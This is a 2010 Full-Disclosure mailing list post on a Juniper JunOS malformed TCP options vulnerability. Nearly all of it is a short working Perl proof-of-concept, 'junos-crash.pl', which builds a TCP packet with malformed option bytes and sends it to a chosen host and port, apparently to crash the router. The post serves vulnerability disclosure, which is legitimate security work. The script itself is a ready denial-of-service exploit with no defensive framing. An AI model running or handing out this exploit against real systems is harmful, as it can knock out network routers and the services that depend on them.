[Full-disclosure] JunOS malformed TCP options vulnerability
Jeremy L. Gaddis
jeremy at evilrouters.net
Sun Jan 10 02:31:47 GMT 2010
This works for me:
$ cat junos-crash.pl
#!/usr/bin/perl
my $host = shift;
my $port = shift;
use Net::Packet qw($Env);
use Net::Packet::IPv4;
my $ip = Net::Packet::IPv4->new(dst => $host);
use Net::Packet::TCP;
my $tcp = Net::Packet::TCP->new(
dst => $port,
options => "\x65\x02\x01\x01",
);
use Net::Packet::Frame;
my $frame = Net::Packet::Frame->new(l3 => $ip, l4 => $tcp);
$frame->send;
exit 0;
--
Jeremy L. Gaddis
http://evilrouters.net/
Full-Disclosure is hosted and sponsored by Secunia.